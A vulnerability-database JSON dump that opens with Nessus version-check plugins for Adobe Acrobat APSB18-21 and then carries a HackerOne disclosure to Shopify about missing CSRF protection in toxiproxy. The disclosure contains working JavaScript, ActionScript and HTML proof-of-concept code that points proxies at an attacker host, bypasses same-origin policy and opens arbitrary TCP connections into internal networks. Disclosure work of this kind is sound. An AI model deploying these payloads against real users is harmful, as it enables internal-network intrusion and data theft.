script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-12782\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_acrobat_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"Adobe Acrobat\", win_local:TRUE);\ntrack = get_kb_item(\"SMB/Acrobat/\"+app_info['version']+\"/Track\");\n\nif (!empty_or_null(track) && track == '2017')\n{\n constraints = [\n { \"min_version\" : \"17.8\", \"fixed_version\" : \"17.011.30096\" }\n ];\n}\nelse\n{\n constraints = [\n { \"min_version\" : \"15.6\", \"fixed_version\" : \"15.006.30434\" },\n { \"min_version\" : \"18.8\", \"fixed_version\" : \"18.011.20055\" }\n ];\n}\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-10T23:52:21", "references": ["https://helpx.adobe.com/security/products/acrobat/apsb18-21.html"], "pluginID": "111009", "description": "The version of Adobe Acrobat installed on the remote macOS or Mac OS X host is a version prior to 15.006.30434, 17.011.30096, or 18.011.20055. It is, therefore, affected by multiple vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 7, "reporter": "Tenable", "published": "2018-07-12T00:00:00", "title": "Adobe Acrobat < 15.006.30434 / 17.011.30096 / 18.011.20055 Multiple Vulnerabilities (APSB18-21) (macOS)", "type": "nessus", "enchantments": {"score": {"modified": "2018-12-10T23:52:21", "vector": "NONE", "value": 5.0}}, "naslFamily": "MacOS X Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5025", "CVE-2018-12803", "CVE-2018-12776", "CVE-2018-5011", "CVE-2018-5067", "CVE-2018-12784", "CVE-2018-5061", "CVE-2018-5031", "CVE-2018-5047", "CVE-2018-5020", "CVE-2018-12754", "CVE-2018-5033", "CVE-2018-12757", "CVE-2018-5065", "CVE-2018-5054", "CVE-2018-12802", "CVE-2018-12761", "CVE-2018-5010", "CVE-2018-5036", "CVE-2018-5024", "CVE-2018-5048", "CVE-2018-5018", "CVE-2018-5034", "CVE-2018-5028", "CVE-2018-12779", "CVE-2018-12783", "CVE-2018-5051", "CVE-2018-5052", "CVE-2018-12781", "CVE-2018-5044", "CVE-2018-5014", "CVE-2018-12760", "CVE-2018-12798", "CVE-2018-5043", "CVE-2018-5050", "CVE-2018-5070", "CVE-2018-5058", "CVE-2018-5063", "CVE-2018-5066", "CVE-2018-5042", "CVE-2018-12787", "CVE-2018-5019", "CVE-2018-5046", "CVE-2018-5027", "CVE-2018-5041", "CVE-2018-5068", "CVE-2018-5045", "CVE-2018-12777", "CVE-2018-5069", "CVE-2018-12794", "CVE-2018-5055", "CVE-2018-5021", "CVE-2018-5062", "CVE-2018-12765", "CVE-2018-5009", "CVE-2018-5039", "CVE-2018-12774", "CVE-2018-12790", "CVE-2018-12782", "CVE-2018-12771", "CVE-2018-12793", "CVE-2018-12762", "CVE-2018-12763", "CVE-2018-5035", "CVE-2018-5056", "CVE-2018-5032", "CVE-2018-12780", "CVE-2018-12788", "CVE-2018-5015", "CVE-2018-5017", "CVE-2018-12766", "CVE-2018-5016", "CVE-2018-12785", "CVE-2018-12796", "CVE-2018-12764", "CVE-2018-12770", "CVE-2018-12756", "CVE-2018-12792", "CVE-2018-5030", "CVE-2018-5038", "CVE-2018-12797", "CVE-2018-5026", "CVE-2018-5023", "CVE-2018-5049", "CVE-2018-12768", "CVE-2018-5040", "CVE-2018-12755", "CVE-2018-5029", "CVE-2018-12789", "CVE-2018-5057", "CVE-2018-12767", "CVE-2018-12791", "CVE-2018-5064", "CVE-2018-5012", "CVE-2018-5022", "CVE-2018-12758", "CVE-2018-12773", "CVE-2018-5060", "CVE-2018-12786", "CVE-2018-12772", "CVE-2018-5059", "CVE-2018-12795", "CVE-2018-5037", "CVE-2018-5053"], "modified": "2018-12-07T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "MACOSX_ADOBE_ACROBAT_APSB18-21.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111009", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111009);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/12/07 17:08:17\");\n\n script_cve_id(\n \"CVE-2018-5009\",\n \"CVE-2018-5010\",\n \"CVE-2018-5011\",\n \"CVE-2018-5012\",\n \"CVE-2018-5014\",\n \"CVE-2018-5015\",\n \"CVE-2018-5016\",\n \"CVE-2018-5017\",\n \"CVE-2018-5018\",\n \"CVE-2018-5019\",\n \"CVE-2018-5020\",\n \"CVE-2018-5021\",\n \"CVE-2018-5022\",\n \"CVE-2018-5023\",\n \"CVE-2018-5024\",\n \"CVE-2018-5025\",\n \"CVE-2018-5026\",\n \"CVE-2018-5027\",\n \"CVE-2018-5028\",\n \"CVE-2018-5029\",\n \"CVE-2018-5030\",\n \"CVE-2018-5031\",\n \"CVE-2018-5032\",\n \"CVE-2018-5033\",\n \"CVE-2018-5034\",\n \"CVE-2018-5035\",\n \"CVE-2018-5036\",\n \"CVE-2018-5037\",\n \"CVE-2018-5038\",\n \"CVE-2018-5039\",\n \"CVE-2018-5040\",\n \"CVE-2018-5041\",\n \"CVE-2018-5042\",\n \"CVE-2018-5043\",\n \"CVE-2018-5044\",\n \"CVE-2018-5045\",\n \"CVE-2018-5046\",\n \"CVE-2018-5047\",\n \"CVE-2018-5048\",\n \"CVE-2018-5049\",\n \"CVE-2018-5050\",\n \"CVE-2018-5051\",\n \"CVE-2018-5052\",\n \"CVE-2018-5053\",\n \"CVE-2018-5054\",\n \"CVE-2018-5055\",\n \"CVE-2018-5056\",\n \"CVE-2018-5057\",\n \"CVE-2018-5058\",\n \"CVE-2018-5059\",\n \"CVE-2018-5060\",\n \"CVE-2018-5061\",\n \"CVE-2018-5062\",\n \"CVE-2018-5063\",\n \"CVE-2018-5064\",\n \"CVE-2018-5065\",\n \"CVE-2018-5066\",\n \"CVE-2018-5067\",\n \"CVE-2018-5068\",\n \"CVE-2018-5069\",\n \"CVE-2018-5070\",\n \"CVE-2018-12784\",\n \"CVE-2018-12754\",\n \"CVE-2018-12755\",\n \"CVE-2018-12756\",\n \"CVE-2018-12757\",\n \"CVE-2018-12758\",\n \"CVE-2018-12760\",\n \"CVE-2018-12761\",\n \"CVE-2018-12762\",\n \"CVE-2018-12763\",\n \"CVE-2018-12764\",\n \"CVE-2018-12765\",\n \"CVE-2018-12766\",\n \"CVE-2018-12767\",\n \"CVE-2018-12768\",\n \"CVE-2018-12770\",\n \"CVE-2018-12771\",\n \"CVE-2018-12772\",\n \"CVE-2018-12773\",\n \"CVE-2018-12774\",\n \"CVE-2018-12776\",\n \"CVE-2018-12777\",\n \"CVE-2018-12779\",\n \"CVE-2018-12780\",\n \"CVE-2018-12781\",\n \"CVE-2018-12782\",\n \"CVE-2018-12783\",\n \"CVE-2018-12785\",\n \"CVE-2018-12786\",\n \"CVE-2018-12787\",\n \"CVE-2018-12788\",\n \"CVE-2018-12789\",\n \"CVE-2018-12790\",\n \"CVE-2018-12791\",\n \"CVE-2018-12792\",\n \"CVE-2018-12793\",\n \"CVE-2018-12794\",\n \"CVE-2018-12795\",\n \"CVE-2018-12796\",\n \"CVE-2018-12797\",\n \"CVE-2018-12798\",\n \"CVE-2018-12802\",\n \"CVE-2018-12803\"\n );\n script_bugtraq_id(\n 104699,\n 104700,\n 104701,\n 104704\n );\n\n script_name(english:\"Adobe Acrobat < 15.006.30434 / 17.011.30096 / 18.011.20055 Multiple Vulnerabilities (APSB18-21) (macOS)\");\n script_summary(english:\"Checks the version of Adobe Acrobat.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote macOS or Mac OS X\nhost is a version prior to 15.006.30434, 17.011.30096, or\n18.011.20055. It is, therefore, affected by multiple vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-21.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat 15.006.30434 / 17.011.30096 / 18.011.20055 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-12782\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_acrobat_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\napp_info = vcf::get_app_info(app:\"Adobe Acrobat\");\ntrack = get_kb_item(\"MacOSX/Adobe_Acrobat/Track\");\n\nif (!empty_or_null(track) && track == '2017')\n{\n constraints = [\n { \"min_version\" : \"17.8\", \"fixed_version\" : \"17.011.30096\" }\n ];\n}\nelse\n{\n constraints = [\n { \"min_version\" : \"15.6\", \"fixed_version\" : \"15.006.30434\" },\n { \"min_version\" : \"18.8\", \"fixed_version\" : \"18.011.20055\" }\n ];\n}\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "hackerone": [{"lastseen": "2018-07-30T14:12:04", "references": [], "bounty": 0.0, "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/001/382/1e9872bf9cfe04008c2673e07bfecaa83858cca1_small.jpg?1532728703", "medium": "https://profile-photos.hackerone-user-content.com/000/001/382/30421c25f4a7b03ec3250e36efb64f7291402806_medium.jpg?1532728703"}, "handle": "shopify", "url": "https://hackerone.com/shopify"}, "bountyState": "resolved", "description": "# Disclaimer\nIn case this report ever becomes public I wanted to start it out with a disclaimer so it doesn't become referenced an example for out-of-scope/policy violating submissions in the future:\n\n* At the time of submission this report is out-of-scope and as such I have no expectations of reward.\n* At no point was this ever tested against Shopify infrastructure, all testing was completed locally and the potential abuse vectors are theoretical at best.\n* The impact of this report is highly dependent on the architecture of the internal network at Shopify, without knowledge of the internal layout I can only speculate on impact.\n* This issue was reported privately via HackerOne (instead of a public GitHub issue) so the Shopify team could choose how to handle the report. I fully respect any decision they make regarding fixing this issue or leaving it as is to not break existing functionality. \n\n# Background\nIn [early 2015](https://engineering.shopify.com/blogs/engineering/building-and-testing-resilient-ruby-on-rails-applications?utm_campaign=Feed%3A%20Sirupsen%20%28Sirupsen%29&utm_medium=feed&utm_source=feedburner) the Shopify engineering team [open-sourced](https://github.com/Shopify/toxiproxy) a tool called \"Toxiproxy\". The tool is designed to simulate chaotic network conditions by proxying TCP traffic to help understand and test how an application behaves under extreme load or other error conditions caused by network issues. The tool works by exposing a [HTTP API](https://github.com/Shopify/toxiproxy#http-api) which is bound to port `8474` on the loopback interface (by default, this is customizable). The API allows clients to start and stop new proxies as well as start and stop [toxics](https://github.com/Shopify/toxiproxy#toxics) to simulate error conditions for each proxy. The tool can be installed from the [Shopify HomeBrew tap](https://github.com/Shopify/homebrew-shopify) on macOS as well as well as from [pre-compiled binaries](https://github.com/Shopify/toxiproxy/releases) on other platforms. For this report it is assumed that the tool has already been installed and the service configured to run in the background (as suggested in [the documentation](https://github.com/Shopify/homebrew-shopify/blob/master/toxiproxy.rb#L28)). See the \"Environment Setup\" section for more details.\n\n# Description\nThe [HTTP API](https://github.com/Shopify/toxiproxy#http-api) for toxiproxy does not have any CSRF protections. This allows a malicious webpage to configure, start, and modify arbitrary proxies. By exploiting [same-origin policy](https://en.wikipedia.org/wiki/Same-origin_policy) and Adobe Flash [socket policy files](http://www.adobe.com/devnet/flashplayer/articles/socket_policy_files.html) a malicious webpage can abuse this CSRF make arbitrary TCP connections (including HTTP connections) within the internal network of a toxiproxy user. This could be used to exfiltrate data from systems which are not exposed to the internet but are accessible by the victim. Please note the attacker would not gain access to the victim's existing authenticated sessions and as such could only use this issue to access systems which are protected solely by IP whitelists or have weak/no authentication. A number of PoCs can be found below...\n\n\n# Impact\nIf a Shopify employee who has toxiproxy installed clicks a malicious link a malicious actor can gain access to the internal network of Shopify with the ability to read/write arbitrary TCP connections within the network. Additionally, because DNS resolution is done by the toxiproxy server the attacker may not even need to map the internal network ahead of time, they could provide internal hostnames and they will be faithfully resolved by the internal split-DNS provider. The impact of this access is highly dependent on what systems are accessible without authentication (or with weak auth) within the Shopify internal network, I'll choose not to speculate there and let the Shopify team better assess the impact.\n\n# Remediation\nThe API should implement some form of CSRF protection, ideally by just placing the entire API behind authentication.\n\n\n# Environment Setup\nAll exploits described in this report were tested on `macOS Sierra 10.12.3 (16D32)` against `toxiproxy v2.1.1` (latest at the time of submission) which was installed as follows:\n\n``` \n$ brew update\n\t[snip]\n$ brew install toxiproxy\n\t==> Installing toxiproxy from shopify/shopify\n\t==> Downloading https://github.com/Shopify/toxiproxy/releases/download/v2.1.1/toxiproxy-server\n\tAlready downloaded: /Users/luke/Library/Caches/Homebrew/toxiproxy-2.1.1\n\t==> Downloading https://github.com/Shopify/toxiproxy/releases/download/v2.1.1/toxiproxy-cli-da\n\tAlready downloaded: /Users/luke/Library/Caches/Homebrew/toxiproxy--cli-2.1.1\n\t==> Caveats\n\tTo have launchd start shopify/shopify/toxiproxy now and restart at login:\n\t brew services start shopify/shopify/toxiproxy\n\tOr, if you don't want/need a background service you can just run:\n\t toxiproxy\n\t==> Summary\n\t\ud83c\udf7a /usr/local/Cellar/toxiproxy/2.1.1: 5 files, 13.4MB, built in 1 second\n$ brew services start shopify/shopify/toxiproxy\n\t==> Successfully started `toxiproxy` (label: homebrew.mxcl.toxiproxy)\n```\n\nA number of servers have been setup on [toxiproxy.attackerdoma.in](http://toxiproxy.attackerdoma.in) to facilitate the PoCs, the source code for these can be found at the following private gist: [gist.github.com/bored-engineer/50aa6591f307d51c28b4be71dd80f8a9](https://gist.github.com/bored-engineer/50aa6591f307d51c28b4be71dd80f8a9). Please note that these are servers are hosted on ephemeral instance and likely will not remain online after the report has been triaged and resolved. \n\n# PoC - Create a new proxy\nDemonstrating the issue is fundamentally pretty simple and can be done as follows...\n\nPoC available at: [attackerdoma.in/7c9e1586-ab53-48d7-9704-165865a90ab1.html](http://attackerdoma.in/7c9e1586-ab53-48d7-9704-165865a90ab1.html)\n\n```js\nfetch(\"http://localhost:8474/proxies\", {\n\tmethod: \"POST\",\n\tmode: \"no-cors\",\n\tbody: JSON.stringify({\n\t\tname: \"csrf\",\n\t\tlisten: \"0.0.0.0:2773\",\n\t\tupstream: \"toxiproxy.attackerdoma.in:12773\",\n\t\tenabled: true\n\t}),\n});\n```\n\nYou can verify the PoC worked correctly by either accessing the new proxy at [http://127.0.0.1:2773/1efb54c5](http://127.0.0.1:2773/1efb54c5) or via the [toxiproxy-cli](https://github.com/Shopify/toxiproxy#cli-example):\n\n```\n$ toxiproxy-cli inspect csrf\nName: csrf\tListen: 127.0.0.1:2773\tUpstream: toxiproxy.attackerdoma.in:2773\n======================================================================\nProxy has no toxics enabled.\n```\n\n# PoC - Bypass SOP to read current state\nWhile we can CSRF the creation of proxies, we cannot read the current toxiproxy state which could contain useful information for an attacker as it is blocked by [SOP](https://en.wikipedia.org/wiki/Same-origin_policy). We can bypass this restriction by executing the following steps:\n\n1. CSRF create a new `pivot` proxy pointing to `http://attackerdoma.in:17486`\n2. Redirect the webpage to the new `pivot` proxy\n3. From the new webpage use the CSRF to change the upstream for the `pivot` proxy to point to `http://127.0.0.1:8474` (the toxiproxy HTTP API)\n4. Make a XHR request to read the configuration (because the browser believes it is still communicating with the same origin, this is allowed)\n\n\nPoC available at: [attackerdoma.in/a10f2786-7149-43e8-8a90-b3fa46caafd5.html](http://attackerdoma.in/a10f2786-7149-43e8-8a90-b3fa46caafd5.html)\n\nThe PoC for this consists of two stages...\n\n```js\n// Get the instance we are exploiting\nlet toxiproxy = new URL(prompt(\"Enter the URL of the toxiproxy instance you would like to CSRF:\", \"http://localhost:8474\"));\ntoxiproxy.pathname = \"proxies\";\n// CSRF creation of the proxy\nfetch(toxiproxy.toString(), {\n\tmethod: \"POST\",\n\tmode: \"no-cors\",\n\tbody: JSON.stringify({\n\t\tname: \"pivot\",\n\t\tlisten: \"0.0.0.0:7486\",\n\t\tupstream: \"toxiproxy.attackerdoma.in:17486\",\n\t\tenabled: true\n\t}),\n}).then(() => {\n\t// There is a chance the \"pivot\" proxy already exists, if so modify it instead\n\ttoxiproxy.pathname = \"proxies/pivot\"\n\treturn fetch(toxiproxy.toString(), {\n\t\tmethod: \"POST\",\n\t\tmode: \"no-cors\",\n\t\tbody: JSON.stringify({\n\t\t\tname: \"pivot\",\n\t\t\tlisten: \"0.0.0.0:7486\",\n\t\t\tupstream: \"toxiproxy.attackerdoma.in:17486\",\n\t\t\tenabled: true\n\t\t}),\n\t})\n}).then(() => {\n\t// Redirect to the PoC, passing the toxiproxy URL used (in-case it was custom)\n\tlet pivotproxy = new URL(toxiproxy);\n\tpivotproxy.port = 7486;\n\tpivotproxy.pathname = \"3450b92c\";\n\tpivotproxy.hash = \"#\" + toxiproxy.toString();\n\twindow.location.href = pivotproxy.toString();\n});\n```\nFollowed by the second stage:\n\n```js\n// CSRF the proxy to point to it's own HTTP interface\nlet toxiproxy = new URL(window.location.hash.substring(1));\ntoxiproxy.pathname = \"/proxies/pivot\";\nfetch(toxiproxy.toString(), {\n\tmethod: \"POST\",\n\tmode: \"no-cors\",\n\tbody: JSON.stringify({\n\t\tname: \"pivot\",\n\t\tlisten: \"0.0.0.0:7486\",\n\t\tupstream: toxiproxy.host,\n\t\tenabled: true\n\t}),\n}).then(() => {\n\t// Fetch the list of proxies from ourself (allows because it's same-origin)\n\tlet self = new URL(window.location.href);\n\tself.pathname = \"/proxies\";\n\treturn fetch(self.toString(), {\n\t\tmethod: \"GET\",\n\t})\n}).then((r) => r.json()).then((conf) => {\n\tdocument.write(\"<pre>Exfiltrated the following toxiproxy configuration:\\n\" + JSON.stringify(conf, null, 2) + \"</pre>\");\n});\n```\n# PoC - Connect to arbitrary hosts and read/write arbitrary TCP data\nWhile reading and writing HTTP traffic is fun, the holy grail of internal network access is the ability to read/write arbitrary TCP traffic. This is actually possible due to Adobe Flash. Flash has had the ability to read/write raw TCP sockets for a number of years however it requires that the TCP server it connects to respond with a [socket policy file](http://www.adobe.com/devnet/flashplayer/articles/socket_policy_files.html) when requested. Thankfully, per the documentation, once flash has received permission it will cache it indefinitely (per IP/port pair):\n\n> Once Flash Player receives permission, it will remember the result for the lifetime of the SWF file. Flash Player associates each socket policy file to an IP address, and it needs a policy file for each connection to a new IP address. For instance, assume that the developer specifies a hostname for the connection and that a DNS lookup returns multiple IP addresses. Every time the IP address changes for the hostname, Flash Player will check the new IP address for a socket policy file. This helps to protect against DNS rebinding attacks.\n\nBy using a similar technique as the previous PoC we can swap out the upstream proxy once this permission has been granted and cached, allowing us to read/write arbitrary TCP traffic within the network. The attack looks like this:\n\n1. Load a specially crafted SWF file which we will use to send the data\n2. CSRF create a new `policy` proxy pointing to `attackerdoma.in:17654`\n2. Trigger the SWF to open a socket to the `policy` proxy which will grant full permissions (and be cached for the lifetime of the SWF) \n3. Use the CSRF to change the upstream for the `pivot` proxy to point to our target TCP address.\n4. Make arbitrary TCP connections from the SWF\n\nThe PoC for this consists of two parts...\nPoC available at: [attackerdoma.in/0761bfa0-b69a-436b-a474-c67b04157abd.html](http://attackerdoma.in/0761bfa0-b69a-436b-a474-c67b04157abd.html)\n\nThe ActionScript for the SWF file is as follows (compiled with the Adobe Flex SDK 4.6):\n\n```actionscript\npackage {\n\timport flash.display.Sprite;\n\timport flash.net.Socket;\n\timport flash.system.Security;\n\timport flash.events.*;\n\timport flash.external.ExternalInterface;\n\n\tpublic class Main extends Sprite {\n\n\t\tpublic function Main() {\n\t\t\tSecurity.allowDomain(\"*\");\n\t\t\tSecurity.allowInsecureDomain(\"*\");\n\t\t\tExternalInterface.addCallback(\"connect\", connect);\n\t\t\tExternalInterface.call(\"onready\");\n\t\t}\n\n\t\tpublic function dataHandler(event:ProgressEvent):void { \n\t\t\tvar socket:Socket = event.target as Socket;\n\t\t\tvar msg:String = socket.readUTFBytes(socket.bytesAvailable); \n\t\t\tExternalInterface.call(\"onsocketdata\", escape(msg));\n\t\t}\n\n\t\tpublic function closeHandler(event:Event):void { \n\t\t\tExternalInterface.call(\"onsocketclose\");\n\t\t}\n\n\t\tpublic function connect(host:String, port:int, msg:String):String {\n\t\t\tvar socket:Socket;\n\t\t\tsocket = new Socket();\n\t\t\ttry {\n\t\t\t\tsocket.connect(host, port);\n\t\t\t\tsocket.writeUTFBytes(msg); \n\t\t\t\tsocket.addEventListener(Event.CLOSE, closeHandler);\n\t\t\t\tsocket.addEventListener(ProgressEvent.SOCKET_DATA, dataHandler); \n\t\t\t\tsocket.flush(); \n\t\t\t} catch (error:Error) { \n\t\t\t\tsocket.close(); \n\t\t\t\treturn error.message;\n\t\t\t} \n\t\t\treturn \"\";\n\t\t}\n\t}\n}\n```\nThe HTML/JS for the PoC is as follows:\n\n```html\n<!DOCTYPE html>\n<html>\n\t<head>\n\t\t<script>\n\t\t\t// Called by flash once loaded\n\t\t\tfunction onready() {\n\t\t\t\t// Get access to the flash objects\n\t\t\t\tlet flash = document.getElementById(\"flash\");\n\t\t\t\t// Get the instance we are exploiting\n\t\t\t\tlet toxiproxy = new URL(prompt(\"Enter the URL of the toxiproxy instance you would like to CSRF:\", \"http://localhost:8474\"));\n\t\t\t\ttoxiproxy.pathname = \"proxies\";\n\t\t\t\t// CSRF creation of the proxy\n\t\t\t\tfetch(toxiproxy.toString(), {\n\t\t\t\t\tmethod: \"POST\",\n\t\t\t\t\tmode: \"no-cors\",\n\t\t\t\t\tbody: JSON.stringify({\n\t\t\t\t\t\tname: \"policy\",\n\t\t\t\t\t\tlisten: \"0.0.0.0:7654\",\n\t\t\t\t\t\tupstream: \"toxiproxy.attackerdoma.in:17654\",\n\t\t\t\t\t\tenabled: true\n\t\t\t\t\t}),\n\t\t\t\t}).then(() => {\n\t\t\t\t\t// There is a chance the \"policy\" proxy already exists, if so modify it instead\n\t\t\t\t\ttoxiproxy.pathname = \"proxies/policy\"\n\t\t\t\t\treturn fetch(toxiproxy.toString(), {\n\t\t\t\t\t\tmethod: \"POST\",\n\t\t\t\t\t\tmode: \"no-cors\",\n\t\t\t\t\t\tbody: JSON.stringify({\n\t\t\t\t\t\t\tname: \"policy\",\n\t\t\t\t\t\t\tlisten: \"0.0.0.0:7654\",\n\t\t\t\t\t\t\tupstream: \"toxiproxy.attackerdoma.in:17654\",\n\t\t\t\t\t\t\tenabled: true\n\t\t\t\t\t\t}),\n\t\t\t\t\t});\n\t\t\t\t}).then(() => {\n\t\t\t\t\t// Once the socket has connected the first time our policy is cached\n\t\t\t\t\twindow.onsocketclose = () => {\n\t\t\t\t\t\t// Change the proxy to point to the target\n\t\t\t\t\t\tlet target = new URL(\"http://\" + prompt(\"Enter the TCP host/ip pair you would like to connect to:\", \"localhost:9999\"));\n\t\t\t\t\t\tfetch(toxiproxy.toString(), {\n\t\t\t\t\t\t\tmethod: \"POST\",\n\t\t\t\t\t\t\tmode: \"no-cors\",\n\t\t\t\t\t\t\tbody: JSON.stringify({\n\t\t\t\t\t\t\t\tname: \"policy\",\n\t\t\t\t\t\t\t\tlisten: \"0.0.0.0:7654\",\n\t\t\t\t\t\t\t\tupstream: target.host,\n\t\t\t\t\t\t\t\tenabled: true\n\t\t\t\t\t\t\t}),\n\t\t\t\t\t\t}).then(() => {\n\t\t\t\t\t\t\tlet data = prompt(\"Enter the data you would like to send:\", \"Hello World\");\n\t\t\t\t\t\t\tlet response = \"\";\n\t\t\t\t\t\t\twindow.onsocketdata = (socketData) => {\n\t\t\t\t\t\t\t\tresponse += socketData;\n\t\t\t\t\t\t\t};\n\t\t\t\t\t\t\twindow.onsocketclose = () => {\n\t\t\t\t\t\t\t\tdocument.write(`<pre>Got Response:\\n${response}</pre>`);\n\t\t\t\t\t\t\t};\n\t\t\t\t\t\t\tflash.connect(toxiproxy.hostname, 7654, data);\n\t\t\t\t\t\t});\n\t\t\t\t\t};\n\t\t\t\t\t// Trigger the first cache\n\t\t\t\t\tconsole.log(flash)\n\t\t\t\t\tflash.connect(toxiproxy.hostname, 7654, \"cache\");\n\t\t\t\t});\n\t\t\t}\n\t\t</script>\n\t</head>\n\t<body>\n\t\t<object id=\"flash\" name=\"flash\" type=\"application/x-shockwave-flash\" data=\"10495ef1-3be0-49b2-8872-2f09e29ad848.swf\">\n\t\t <param name=\"movie\" value=\"10495ef1-3be0-49b2-8872-2f09e29ad848.swf\" />\n\t\t <param name=\"AllowScriptAccess\" value=\"always\" />\n\t\t</object>\n\t</body>\n</html>\n```\n\n# Postscript\nI know this was a rather long report, and it's fundamentally a pretty simple issue, however it's a rather unique issue once you get into exploitation and I had a lot of fun working on it, I hope you guys enjoy it too.", "edition": 2, "reporter": "bored-engineer", "published": "2017-06-04T04:15:23", "title": "Shopify: [out-of-scope] toxiproxy: Lack of CSRF protection allows an attacker to gain access to internal Shopify network", "type": "hackerone", "enchantments": {"score": {"modified": "2018-07-30T14:12:04", "vector": "NONE", "value": 7.5}}, "h1reporter": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/007/328/369436c6c39c8338c3bd3c96466f58fd2b4bee1d_small.png?1467257466"}, "hacker_mediation": false, "disabled": false, "is_me?": false, "hackerone_triager": false, "url": "/bored-engineer", "username": "bored-engineer"}, "bulletinFamily": "bugbounty", "cvelist": [], "modified": "2018-07-11T20:32:48", "id": "H1:236349", "href": "https://hackerone.com/reports/236349", "cvss": {"score": 0.0, "vector": "NONE"}}]}
